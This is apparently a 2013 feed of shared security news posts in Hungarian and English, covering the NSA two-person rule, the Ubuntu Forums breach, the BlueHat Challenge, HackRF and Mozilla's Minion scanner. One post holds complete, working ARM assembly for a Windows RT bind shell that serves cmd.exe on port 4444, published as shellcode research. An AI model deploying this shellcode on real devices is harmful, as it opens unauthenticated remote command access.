Buherator
Shared posts
Kétemberes szabályt vezetett be rendszeradminisztrátorai számára az NSA
Bruce Schneier biztonsági szakértő arról ír blogjában, hogy reagálva a Snowden-fiaskóra, az NSA kétemberes felügyeleti szabályt vezetett be a rendszeradminisztrátorai számára. Ez azt jelenti, hogy az ügynökség bármelyik rendszeradminisztrátora csak egy másik admin jelenléte mellett férhet hozzá és dolgozhat kulcsfontosságú információkhoz. Mivel közel 15 ezer telephelyen kell az új szabályt bevezetni, időbe telik majd, amíg mindenhol érvényre jut.
Keith Alexander, az NSA vezetője elmondta, hogy most már a zárva vannak a szerverszobák ahol ilyen jellegű adatokat tárolnak és csak kétfős csapatokban lehet azokba bejutni. Alexander azt is elmondta, hogy az NSA tesztidőszak után ezek a biztosítékok beépítésre kerülnének a Pentagon és a hírszerző ügynökségeknél.
Részletek itt.
Lassan visszatér az Ubuntu Forums
Miután biztonsági incidens történt az Ubuntu fórumoknak otthont adó ubuntuforums.org-on és közel 2 millió felhasználó neve, e-mail címe, titkosított jelszava került illetéktelenek kezébe, az oldal offline állapotba került. Az elmúlt napokban az infrastruktúráért felelős csapat a szolgáltatás helyreállításán dolgozott. A munka a vége felé jár, a Canonical pedig egy összefoglalót adott ki arról, hogy mi is történt valójában. A jelentés elolvasható itt.
A fórumok jelenleg elérhetők.
Mégsincs tiltólistán a Lenovo
Bradley Manning: guilty of espionage but not aiding the enemy. But was justice served? [POLL]
Try something new – Beat the BlueHat Challenge!
We were inspired by the Matasano Crypto Challenges. So we built a similar series of fun challenges to exercise reverse engineering, vulnerability discovery, and web browser manipulation attack concepts. The Xbox team helped us develop custom Xbox Live avatar items to be awarded to anyone who completes any track of the BlueHat Challenge. Beat all three tracks for access to all three avatar items (“hacker” T-shirt, “MSRC” T-shirt, “hacker” blue hat).
The challenges are all about fun and trying new things. To sign up for any of the three tracks (reverse engineering, vulnerability discovery, design-level web browser manipulation tricks), just email us at bhchall@microsoft.com. In the subject line or in the body of the message, include either [reverse], [vulns], or [web] (or click on any of those three links). Signing up for any of the three tracks will also include instructions on participating in all tracks so you can send just one email to get started.
The Challenge is designed to appeal to a wide range of people, so if the first few sets of problems seem easy, stick with it. They’ll get harder!
More information
- There’s no restriction on who can participate, no time limit, and no way to fail.
- There is no monetary reward, and this is not a contest. Your answers should be your own work. We hope that the fun and learning you gain from completing the Challenge is reward enough. We do plan on publicly recognizing people who finish the Challenge.
- If you find this sort of thing fun, you’d probably like working at Microsoft in the Trustworthy Computing group. We solve problems like this every day and we have lots of open positions. You can see a list of our available positions at http://www.twccareers.com, and we encourage you to submit an application!
You may also be interested in the Microsoft Security Bounty Programs, which provide cash rewards for eligible individuals who identify security vulnerabilities.
A quick word from our lawyers…
By participating in the Challenge, you understand that we cannot control the incoming information you will disclose to our representatives in the course of submitting your answers in the Challenge, or what our representatives will remember about your submission. You also understand that we will not restrict work assignments of representatives who have had access to your submission. By participating in the Challenge, you agree that use of information in our representatives’ unaided memories in the development or deployment of our products or services does not create liability for us in connection with the Challenge or under copyright or trade secret law.
If you do not want to grant us these rights to your answers, please do not participate in the Challenge.
FAQ
What is the BlueHat Challenge?
The BlueHat Challenge is a series of computer security problems of increasing difficulty to help you build and test your skills in three areas: reverse engineering, vulnerability discovery, and web browser manipulation attack concepts.
How does it work?
The problems are given and reviewed over email. As you complete each level, send us your answers and we’ll send you the next set of problems.
Why is Microsoft doing this?
We hope to spur interest in computer security and help people improve their skills through a self-directed learning process. We also want to give something back to the community—we think these problems are going to be a lot of fun for you to solve. We had a lot of fun coming up with them!
How long should I expect to wait for my submitted answers to be evaluated?
The timeline for evaluating the problems will depend on the number of participants in the program, the difficulty of the problem, and the clarity of your answer. Your answers are being evaluated by real people, so please be patient with us!
How long will the program continue?
We plan to continue the program as long as there is sufficient community interest. Of course, we may change the program’s design over time as we learn what works best, and we may cancel the program at any time without notice. If there is a particular aspect of the program you like, or one track that you think is better developed than others, please let us know so we can do more of that and less of other things.
Is this the new monetary incentive/bounty program I’ve heard about?
No. This program is an educational challenge with no monetary reward. The new programs that offer monetary incentive are the Security Bounty Programs.
Where can I find information on Microsoft jobs?
Check out http://www.twccareers.com for careers in Microsoft Trustworthy Computing group. See http://www.microsoft.com/careers for more general Microsoft career information.
If I complete the Challenge and do well, am I guaranteed an interview or a job?
No. Your completion of the Challenge or your performance will not guarantee that you will get an interview or a job, nor will it preclude you from doing so. If you are interested in careers with Microsoft Trustworthy Computing, we encourage you to visit http://www.twccareers.com, where you can submit an application for any open positions that interest you.
Acknowledgements
Many people came together to make the BlueHat Challenge possible:
- Couldn’t have happened without David Seidman’s logistics magic!
- Thanks Fred Raynal and the Quarkslab team for help with the vulnerability and RE challenges
- Thanks Manuel Caballero and Mario Heiderich for developing the web design-level challenges
- Thanks Bill Barlowe, Andrew Ciccarelli, and Shonn Gilson for the back-end infrastructure help
- Thanks Rollie Watson and John Doyle from Xbox and Rajat and Mike from Lakshya Digital
- Thanks Dan Beenfeldt, Tim Hermann, and Nanae Toyozato for the “Eli the Zombie” flash game ([reverse] level 2)
- Thanks Katie Moussouris, Mike Reavey, Leah Lease, Bruce Dang, and David Ross for inspiration
- Jonathan Ness, MSRC Engineering
NSA Director Defends Surveillance To Unsympathetic Black Hat Crowd
Read more of this story at Slashdot.
Cybercriminals Has Heroin Delivered To Brian Krebs, Then Calls Police
Read more of this story at Slashdot.
HackRF, or playing from 30 MHz to 6 GHz
Up on Kickstarter, [Michael Ossmann] is launching the HackRF, an inordinately cheap, exceedingly capable software defined radio tool that’s small enough to lose in your laptop bag.
The HackRF was the subject of a lot of interest last time it was on Hackaday - the ability to receive up to 6GHz allows the HackRF to do a lot of very interesting things, including listening in on Bluetooth, WiFi, and 4G networks. Also, the ability to transmit on these frequencies means a lot of very interesting, and quite possibly slightly evil applications are open to anyone with a HackRF. Like the RTL-SDR dongles, the HackRF works with GNU Radio out of the box, meaning all those cool SDR hacks we’ve seen so far will work with this new, more powerful board.
Compared to the USB TV tuner cards that were so popular a year ago, the HackRF has 10 times the bandwidth, is able to receive up to 6GHz, and is also able to transmit. It’s only half-duplex, so to receive and transmit simultaneously you’ll need two HackRFs, or maybe wait for a hardware revision that will hopefully come sooner rather than later.
Below you can check out [Michael]‘s presentation at Toorcon where the HackRF was unleashed to the world.
Filed under: kickstarter, radio hacks
Introducing Minion
Minion is a platform developed by the Security Automation team at Mozilla to enable integration and adoption of automated security testing that has been under development for the past year.
The platform allows any team to set up the basic requirements to perform automated scanning and testing of websites and services by providing sensible defaults for plugins that enable scanning of many types of web applications and services.
With the 0.3 release of Minion there are several milestones that have been achieved that have allowed us to start using Minion internally across our development community, quality assurance, and security teams.
Architecture
Minion is intended to be a platform that is simple to use, easy to deploy, simple to extend, and flexible enough to be integrated into any development or operations workflows. At a high level there are three major components in Minion: Plugins, Task Engine, and Front End.
Minon Plugins are light-weight wrappers that perform tasks such as configuring, starting, stopping a plan, and accept a set of callbacks to notify the caller that information is available. In order to be used, Plugins require a plugin runner that handles the invocation of the plugins as well as the results; in addition to supporting Minion’s task engine, the Minion backend repository includes command-line scripts to execute plugins. This provides support for testing during development of new plugins and allow a high degree of flexibility in how plugins are used outside of Minion.
The Task Engine is the core platform; it provides an API for managing and configuring Plans (collections of plugins and configurations), collections of users, sites and services, and the results of executions of Plans against those targets.
The Front End is a web application that provides both administration and usage of Minion; users can perform most of the configuration tasks needed to set up Minion plans, targets and users, as well as review the results of Minion scans. Being a Mozilla project, the front-end uses Persona for authentication, but all access control based decisions are built into Minion itself.
Minion Plugins
At their heart, Minion plugins are automation scripts designed to abstract away the platform, operating system, and features that an individual security tool implements, and provide a single mechanism for configuring the tool, initiating a scan, and collecting the results.
It may be helpful to look at the code for an existing plugin to better understand how they work; the AlivePlugin is a clear, simple example.
The Alive plugin is an extremely basic plugin that confirms that a host is reachable, but it implements all of the required features, and extends a BlockingPlugin. The plugin exposes some member variables that provide user interface cues (the name, links for additional information), and in this case, some built in report objects. In the do_run method the actual logic of the scan is performed, and since there is no detailed setup or stopping functionality is required, the BlockingPlugin starting and stopping functionality is sufficient.
Two base classes for plugins are provided in the Minion backend to get developers started:
- BlockingPlugin this plugin provide the basic functionality to support a plugin that performs a task, and reports it’s completion state at the end. This is suitable for creating straightforward plugins directly within Python
- ExternalProcessPlugin this plugin provides the functionality required to kick-off an external tool, and provides the basis for several other extensions, especially those that wrap existing security tools.
In addition to several basic “proof of technology” plugins that collect details about targets and provide best practice information, the Minion development team is currently maintaining three other extensions:
- OWASP Zed Attack Proxy This plugin wraps the OWASP ZAP platform and enables detailed application scanning
- Skipfish a simple, but powerful web fuzzer from Google
- nmap a port scanning tool that is generally accepted as the best in it’s class
Minion Task Engine
The Task Engine provides the core functionality for managing users, groups, sites, scans, and results within the Minion platform. Acting as a central hub, the Task Engine maintains a register of available plugins, provides facilities for creating and modifying plans, and managing user access to Minion, including which sites they can scan.
Plugins
Plugin deployment is one of the only features of Minion that cannot currently be managed from within the Front-End; this is a result of the configuration needed to deploy them, but the Minion Front-End provides the ability to review the available plugins, and get the class details, which is the information required to add a plugin to a Plan.
Plans
A Minion Plan is JSON document that provides some information about what the plan does, and a sequence of tools to invoke. An example can be found below:
{ "name": "Fuzz and Scan", "description": "Run Skipfish to fuzz the application, and perform a ZAP scan.", "workflow": [ { "plugin_name": "minion.plugins.skipfish.SkipfishPlugin", "description": "", "configuration": {} }, { "plugin_name": "minion.plugins.zap_plugin.ZAPPlugin", "description": "Run the ZAP Spider and Scanner", "configuration": { "scan": true } } ] }
In this example, the name and description are intended to be human readable descriptions of what the plan will do, while the workflow array contains a set of plugin names, a description that can will be included in the plan details, and a set of configuration details that may be plugin specific.
Users and Invites
Minion is intended to be a team oriented tool; as a result, the the platform allows user and group management. User accounts are created through an invitation mechanism, or via the administrative interface. The invitation system allows administrators to pre-create groups, sites and plans within Minion, and then add a user to that group before the user has enrolled. Once the invite is issued, an email will be sent to the user and the user can then access a configured profile.
Groups
Groups are the mechanism by which administrators can control how users have visibility into sites and results within in Minion. In order for a user to be able to interact with a site via Minion, that user needs to be added to the group, and the site needs to be associated with that group. This provides extremely fine grained control over visibility into scan results. Currently group membership allows both viewing of scans and the ability to re-execute a scan, but as the project progresses, constraints can be added to allow users to review results, but not initiate scans.
Minion Front-End
Designed to be easy to use and provide instant feedback, the front-end provides access to the Minion platform. Each of the pieces of the functionality described above is accessible via the front-end, and is explicitly enabled by calling the web services exposed by the Task Engine. One of the advantages of the architecture is that the front-end can be easily re-engineered with no impact to the back-end or plugins.
Technologies
Minion is built with Python, Angular.js, and several packages that assist in ensuring a reliable end to end service. These technologies were selected by our development team, but the architecture, and each of the service boundaries are intended to use JSON calls to permit easy integration with other services. Because of the design principles applied, it is entirely possible to implement plugins that run on any operating system or platform, and do not need to reside on the same service. With the appropriate network configurations it is possible to deploy the front-end, task engine, and plugins on different networks, which allows users to isolate the amount of attack surface that needs to be deployed in sensitive networks.
Road Map
There are several features that are under active development, and should be implemented over the next several releases.
Authentication & Access Management
Site Ownership Verification
This is a critical feature that enables users to demonstrate ownership of a site before initiating scans.
Granular Access Control
The ability to govern users ability to scan by group and site ownership as well as role.
Plugin Improvements
Improved Results Reporting
Minion is only as good as it’s plugins. Now that we have a working and reliable core platform, refinement of plugin results, and improving reporting is a core objective.
Deferred Execution Plugins
Sample implementations of invoking third party services so that we can demonstrate integrating with other Security as a Service platform
Reporting Plugins
Currently we have assigned risk ratings to findings based on our best practices, but that is not necessarily reflective of the priority of issues to other teams. We intend to implement a pluggable reporting interface, including the ability to add plugins to modify the risk ratings based on the security posture and priorities of the teams using Minion.
Front End
Landing Pages
Currently Minion is designed for technical users who have a need to see deep technical details. In the future, it may be desirable to generate metrics and dashboards, and to facilitate that Landing page support will be implemented to allow customization for user views.
Task Engine Improvements
Cohort
Minion is designed to support dynamic analysis via web application scanning. This is only one part of the story regarding how to perform automated security testing. Cohort is a branch of Minion that will enable analysis of source code repositories and perform static analysis.
Historical Issues
In order to facilitate ongoing tracking of a security program, support and integration for third party issue trackers (initial targets are Bugzilla and Github), and the ability to compare multiple scans over time will be implemented.
Why Minion?
The Mozilla Security team supports hundreds of websites of services, and products used by hundreds of millions of users. In addition our team supports hundreds of employees and thousands of community members that contribute to Mozilla products and services. Scaling to that level is not feasible without improving automation capabilities. While it would be much easier to solve this problem for ourselves, Mozilla’s mission is to support the open web, and protect our users. By building Minion as a foundation for a security as a service platform, integrating open source and free tools, then releasing it as open source, we aim to contribute a platform that can be used by any team to dramatically improve their coverage, and integrate security testing automation in all parts of their IT operations and software development processes.
Minion is an open source project, and we welcome contributors, users, and feedback!
Finally, I would like to extend a huge thanks to Stefan Arentz, Simon Bennetts, Yeuk Hon Wong, Matthew Fuller, and all of the other developers who have moved Minion from a sheet of paper and a set of shell scripts to a production service!
Introducing App Reputation for Android Apps
McAfee has always been in the forefront of finding new ways to secure our customers against threats and risks posed by mobile devices. As part of this quest, we have introduced the concept of app reputation as part of our latest release of McAfee Mobile Security (MMS Version 3.1) released on 18th July 2013. From a consumer perspective, we have empowered our twin features of security and privacy by app reputations in this release.
What is app reputation?
We assign a rating to an android app based on two vectors of trust (security) and privacy (data exposure). As part of trust (security), we measure the amount of trust that could be attached to an app based on security considerations. Privacy (data exposure) reputation measures the propensity of an app to access/share and expose personal data. These reputations are based on the results of an automated analysis and are impacted by multiple factors including age, prevalence, source, etc.
How is Trust (Security) reputation different than Privacy (Data Exposure) reputation?
While the concept of security is the same for all users, risk to an individual’s privacy is appreciated differently in different cultures. Furthermore, unlike safety and security, which are intuitive to most of us, the concept of privacy is a trained behavior leading to different responses to privacy risks based on an individual’s context. At McAfee, we appreciate this and it reflects in our design. Hence the goal of privacy reputation is to provide information and avoid taking a uniform decision for all users, unlike what we do in trust reputation.
As the following screenshot indicates, we provide the data exposure score range, category score range, our observations about the app, and information related to ad libraries.
What are Notable apps?
Notable apps are those behaving outside of their category’s normal behavior. We understand that some categories of apps have a need to access more personal information than others. For example, a social media or a communication app would have a better case for accessing personal data than a calculator (productivity) app. So if a calculator apps tries to access personal data normally not accessed by other apps in its category, it may be classified as a notable app.
This is the first blog in a series of posts on app reputation.
Google Starts Upgrading Its SSL Certificates To 2048-bit Keys
Read more of this story at Slashdot.
BGP multiple banking addresses hijacked, (Mon, Jul 29th)
BGP multiple banking addresses hijacked
On 24 July 2013 a significant number ...(more)...
22nd International Obfuscated C Code Contest Starts Thursday 1 Aug 2013
Read more of this story at Slashdot.
[local] - Novell Client 2 SP3 Privilege Escalation Exploit
[papers] - nginx Exploit Documentation About a Generic Way to Exploit Linux Targets
Ransomware tricks child sex abuse image addict into turning self in to cops
Stanford University hacked, becomes latest data breach victim
Cisco’s Acquisition of Sourcefire Highlights Need for a New Generation of Security Technology
English High Court Bans Publication of 0-Day Threat To Auto Immobilizers
Read more of this story at Slashdot.
Windows RT ARMv7-based Shellcode Development
; PoC ARMv7-A Windows RT Bind Shell
; Tested on: Microsoft Surface RT Tablet w/ Windows RT (6.2.9200)
; Syntax: MASM
; Notes: In order for this to work properly, you have to call this payload
; at baseaddress + 1 since it is thumb code.
; This was built with armasm.exe from Visual Studio 2012
; Author: Matthew Graeber (@mattifestation)
; License: BSD 3-Clause
AREA |.foo|, CODE, THUMB
; After linking, the resulting executable will only
; have a single section (with RX permissions) named .foo
EXPORT main
main
push {r4,lr} ; Preserve registers on the stack
bl ExecutePayload ; Execute bind shell function
pop {r4,pc} ; Restore registers on the stack and return to caller
GetProcAddress
; ARM (Thumb) implementation of the logic from the Metasploit x86 block_api shellcode
push {r1-r11,lr} ; Preserve registers on the stack
mov r9,r0 ; Save the function hash in R9
mrc p15,#0,r3,c13,c0,#2 ; R3 = &TEB
ldr r3,[r3,#0x30] ; R3 = &PEB
ldr r3,[r3,#0xC] ; R3 = PEB->Ldr
movs r6,#0 ; R6 = 0
ldr r1,[r3,#0xC] ; R1 = Ldr->InLoadOrderModuleList
ldr r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
ldr r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
ldr r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
str r3,[sp] ; Store BaseDllName.Length/MaximumLength on the stack
cbz r4,exit_failure ; If DllBase == 0, you've likely reached the end of the module list. Return 0.
mov r10,#0xD ; R10 = ROR value (13)
mov r11,#0xD ; R11 = ROR value (13)
get_module_hash ; Improvement: Need to validate MaximumLength != 0
ldrh r5,[sp,#2] ; BaseDllName.MaximumLength
movs r2,#0 ; i = 0
cbz r5,get_export_dir ; Reached the last char of BaseDllName
ror_module_char
ldrsb r3,[r7,r2] ; R3 = (CHAR) *((PCSTR) BaseDllName.Buffer + i)
rors r0,r6,r10 ; Calculate the next portion of the module hash
cmp r3,#0x61 ; Is the character lower case?
blt notlowercase
adds r3,r3,r0 ; Add to the running hash value
subs r6,r3,#0x20 ; Convert character to upper case
b get_next_char
notlowercase
adds r6,r3,r0 ; Add to the running hash value
get_next_char
adds r2,#1 ; Move to the next character
cmp r2,r5 ; Reached the last character in the module name?
bcc ror_module_char ; If not, move on to the next character
get_export_dir
; At this point, the module hash has been calculated.
; Now begin calculating the function hash
ldr r3,[r4,#0x3C] ; IMAGE_DOS_HEADER.e_lfanew - i.e. offset to PE IMAGE_NT_HEADERS
adds r3,r3,r4 ; PIMAGE_NT_HEADERS
ldr r3,[r3,#0x78] ; IMAGE_DIRECTORY_ENTRY_EXPORT.VirtualAddress (only an RVA at this point)
cbz r3,get_next_module ; Move to the next module if it doesn't have an export directory (i.e. most exe files)
adds r5,r3,r4 ; Calculate export dir virtual address
ldr r3,[r5,#0x20] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNames
ldr r7,[r5,#0x18] ; R7 = PIMAGE_EXPORT_DIRECTORY->NumberOfNames
movs r0,#0
adds r8,r3,r4 ; AddressOfNames VA
cbz r7,get_next_module ; Move on to the next module if there are no exported names
calc_func_hash
ldr r3,[r8],#4 ; R3 = Current name RVA
movs r2,#0
adds lr,r3,r4 ; lr = Current name VA
get_func_char
ldrsb r3,[lr] ; Load char from the function name
rors r2,r2,r11 ; Calculate the next portion of the function hash
adds r2,r2,r3 ; Add to the running hash value
ldrsb r3,[lr],#1 ; Peek at the next char
cmp r3,#0 ; Are you at the end of the function string?
bne get_func_char ; If not, calculate hash for the next char.
adds r3,r2,r6 ; Add the module hash to the function hash
cmp r3,r9 ; Does the calulated hash match the hash provided?
beq get_func_addr
adds r0,#1
cmp r0,r7 ; Are there more functions to process?
bcc calc_func_hash
get_next_module
ldr r1,[r1] ; LDR_DATA_TABLE_ENTRY.InLoadOrderLinks.Flink
movs r6,#0 ; Clear the function hash
; Improvement: The following portion is redundant
ldr r4,[r1,#0x18] ; R4 = LDR_DATA_TABLE_ENTRY.DllBase
ldr r3,[r1,#0x2C] ; R3 = LDR_DATA_TABLE_ENTRY.BaseDllName
ldr r7,[r1,#0x30] ; R7 = LDR_DATA_TABLE_ENTRY.BaseDllName.Buffer
cmp r4,#0 ; DllBase == 0?
str r3,[sp] ; Store BaseDllName.Length/MaximumLength on the stack
bne get_module_hash
exit_failure
movs r0,#0 ; Return 0 upon failure to find a matching hash
exit_success
pop {r1-r11,pc} ; Restore stack and return to caller with the function address in R0
get_func_addr
ldr r3,[r5,#0x24] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
add r3,r3,r0,lsl #1
ldrh r2,[r3,r4] ; R2 = Ordinal table index
ldr r3,[r5,#0x1C] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions
add r3,r3,r2,lsl #2
ldr r3,[r3,r4] ; Function RVA
adds r0,r3,r4 ; R0 = Function VA
b exit_success
ExecutePayload
; Improvement: None of the calls to GetProcAddress
; validate that a valid address was actually returned
; Metasploit shellcode doesn't perform this validation either. :P
push {r4-r11,lr} ; Preserve registers on the stack
subw sp,sp,#0x214 ; Allocate soace on the stack for local variables
movs r3,#0x44 ; sizeof(_PROCESS_INFORMATION)
add r2,sp,#0x38 ; R2 = &StartupInfo
movs r1,#0
init_mem1
; Improvement: I could just initialize everything on the stack to 0
strb r1,[r2],#1 ; Set current byte to 0
subs r3,#1
bne init_mem1
movs r3,#0x10 ; sizeof(_STARTUPINFOW)
add r2,sp,#0x28 ; R2 = &ProcessInformation
init_mem2
strb r1,[r2],#1 ; Set current byte to 0
subs r3,#1
bne init_mem2
ldr r0,HASH_LoadLibraryA
bl GetProcAddress
mov r3,r0
adr r0,module_name ; &"ws2_32.dll"
blx r3 ; LoadLibrary("ws2_32.dll");
ldr r0,HASH_WsaStartup
bl GetProcAddress
mov r4,r0
ldr r0,HASH_WsaSocketA
bl GetProcAddress
mov r5,r0
ldr r0,HASH_Bind
bl GetProcAddress
mov r6,r0
ldr r0,HASH_Listen
bl GetProcAddress
mov r7,r0
ldr r0,HASH_Accept
bl GetProcAddress
mov r8,r0
ldr r0,HASH_CloseSocket
bl GetProcAddress
mov r9,r0
ldr r0,HASH_CreateProcess
bl GetProcAddress
mov r10,r0
ldr r0,HASH_WaitForSingleObject
bl GetProcAddress
mov r11,r0
mov r0,#0x0202
add r1,sp,#0x80
blx r4 ; WSAStartup(MAKEWORD(2, 2), &WSAData);
movs r3,#0
movs r2,#0
movs r1,#1
movs r0,#2
str r3,[sp,#4]
str r3,[sp]
blx r5 ; s = WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
movs r3,#2 ; service.sin_family = AF_INET;
strh r3,[sp,#0x18]
movs r3,#0 ; service.sin_addr.s_addr = 0;
str r3,[sp,#0x1C]
mov r3,#0x5C11 ; service.sin_port = HTONS(4444);
movs r2,#0x10
add r1,sp,#0x18
strh r3,[sp,#0x1A]
mov r5,r0 ; WSASocketA returned socket (s)
blx r6 ; Bind( s, (SOCKADDR *) &service, sizeof(service) );
movs r1,#0
mov r0,r5
blx r7 ; Listen( s, 0 );
movs r2,#0
movs r1,#0
mov r0,r5
blx r8 ; AcceptedSocket = Accept( s, 0, 0 );
mov r4,r0
mov r0,r5
blx r9 ; CloseSocket( s ); Close the original socket
mov r3,#0x101 ; StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
str r3,[sp,#0x64]
movs r3,#0x44 ; StartupInfo.cb = 68;
str r3,[sp,#0x38]
add r3,sp,#0x28
str r3,[sp,#0x14]
add r3,sp,#0x38
str r3,[sp,#0x10]
movs r3,#0
str r3,[sp,#0xC]
str r3,[sp,#8]
str r3,[sp,#4]
movs r3,#1
adr r1,cmdline ; &"cmd"
str r3,[sp]
movs r3,#0
movs r2,#0
movs r0,#0
str r4,[sp,#0x78] ; StartupInfo.hStdError = (HANDLE) AcceptedSocket;
str r4,[sp,#0x74] ; StartupInfo.hStdOutput = (HANDLE) AcceptedSocket;
str r4,[sp,#0x70] ; StartupInfo.hStdInput = (HANDLE) AcceptedSocket;
blx r10 ; CreateProcessA( 0, "cmd", 0, 0, TRUE, 0, 0, 0, &StartupInfo, &ProcessInformation );
ldr r0,[sp,#0x28]
mvn r1,#0
blx r11 ; WaitForSingleObject( ProcessInformation.hProcess, INFINITE );
addw sp,sp,#0x214
pop {r4-r11,pc}
HASH_WaitForSingleObject
DCD 0x601d8708
HASH_CreateProcess
DCD 0x863fcc79
HASH_CloseSocket
DCD 0x614d6e75
HASH_Accept
DCD 0xe13bec74
HASH_Listen
DCD 0xff38e9b7
HASH_Bind
DCD 0x6737dbc2
HASH_WsaSocketA
DCD 0xe0df0fea
HASH_WsaStartup
DCD 0x006b8029
HASH_LoadLibraryA
DCD 0x0726774c
cmdline
DCB "cmd", 0x0
module_name
DCB "ws2_32.dll", 0x0
END
1. link.exe requires that you specify an entry point.
Solution: Easy. Provide the '/ENTRY:"main"' switch
2. Depending on the subsystem you choose, link.exe requires certain functions in the CRT to be present. For example, the following subsystems require the following entry point functions:
/SUBSYSTEM:CONSOLE - mainCRTStartup
/DLL - _DllMainCRTStartup
/SUBSYSTEM:WINDOWS - WinMainCRTStartup
/SUBSYSTEM:NATIVE - NtProcessStartup
Meghalt a világ egyik leghíresebb hekkere
Ibrahim Balic takes credit for Apple Dev Centre “attack”, but will he shoulder the blame?
British Prime Minister Promises Default On Porn Blocking
Read more of this story at Slashdot.
MI5 Hiring Industrial Espionage IT Support Staff
Read more of this story at Slashdot.
Biztonsági incidens az Ubuntu Forums-on
Az Ubuntu Forums jelenleg nem elérhető. A weboldalon egy közlemény olvasható arról, hogy a szolgáltatást támadás érte, ezért leállították. A Canonical infrastruktúra csapata megkezdte a szolgáltatás helyreállítását.
A támadók nem csak deface-elték az vBulletin-alapú fórumot, hanem elvitték a közel 2 millió regisztrált felhasználó felhasználónevét, jelszavát, e-mail címét. A jelszavak nem plain text-ben tárolódtak. Ennek ellenére, ha valaki ugyanazt a jelszót használta az Ubuntu Forums-on és más helyeken is, célszerű a többi helyen mihamarabb jelszót váltani. Az Ubuntu One, Launchpad és más Ubuntu/Canonical szolgáltatások nem érintettek az incidensben.
A részletek közleményben.
Ubuntu Forums Security Breach, (Wed, Jul 31st)
Ubuntu forums are currently down because they have been breached. According to their post, &qu ...(more)...
Apple: Developer Site Targeted In Security Attack, Still Down
Read more of this story at Slashdot.